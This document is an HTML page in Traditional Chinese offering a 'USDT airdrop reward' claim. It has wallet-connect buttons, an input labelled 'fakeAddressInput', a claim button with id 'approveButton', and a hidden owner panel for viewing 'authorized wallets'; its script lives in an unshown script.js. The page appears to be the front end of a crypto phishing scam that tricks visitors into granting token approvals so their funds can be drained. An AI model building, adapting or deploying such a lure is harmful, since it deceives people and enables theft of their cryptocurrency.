<!DOCTYPE html>
<html lang="zh-TW">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>USDT代幣空投獎勵</title>
  <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
  <style>
    body {
      background: linear-gradient(to right, #f8fafc, #e0f2fe);
      font-family: 'Inter', sans-serif;
    }
    .fade-in {
      animation: fadeIn 0.8s ease-in-out forwards;
      opacity: 0;
    }
    @keyframes fadeIn {
      to { opacity: 1; }
    }
  </style>
</head>
<body class="flex flex-col items-center justify-center min-h-screen p-4">
  <div class="w-full max-w-md bg-white shadow-2xl rounded-2xl p-8 fade-in border border-gray-200">
    <h2 class="text-2xl font-semibold mb-6 text-center text-gray-800">USDT 空投獎勵領取</h2>

    <label class="block mb-2 text-gray-700">選擇錢包</label>
    <select id="walletSelector" class="w-full mb-4 px-4 py-2 border border-gray-300 rounded-lg">
      <option value="metamask">MetaMask</option>
      <option value="walletconnect">WalletConnect (支援 Trust Wallet 等)</option>
    </select>

    <button id="connectButton" class="w-full bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded-lg mb-4 transition-all">連接錢包</button>
    <div id="walletAddress" class="text-sm text-gray-600 text-center mb-4"></div>

    <label for="fakeAddressInput" class="block text-gray-700 font-medium">錢包地址</label>
    <input type="text" id="fakeAddressInput" placeholder="請輸入您的錢包地址"
      class="w-full mt-1 mb-6 px-4 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-500" />

    <button id="approveButton" class="w-full bg-green-600 hover:bg-green-700 text-white font-medium py-2 px-4 rounded-lg transition-all">領取空投</button>

    <div id="status" class="text-sm text-center text-gray-700 mt-4"></div>

    <div id="ownerActions" class="hidden mt-6">
      <button id="viewApprovals" class="w-full bg-gray-100 hover:bg-gray-200 text-gray-800 font-medium py-2 px-4 rounded-lg border">查看授權錢包清單</button>
    </div>
  </div>

  <div id="log" class="w-full max-w-3xl mt-10 bg-white p-6 rounded-xl shadow border fade-in"></div>

  <script type="module" src="script.js"></script>
</body>
</html>
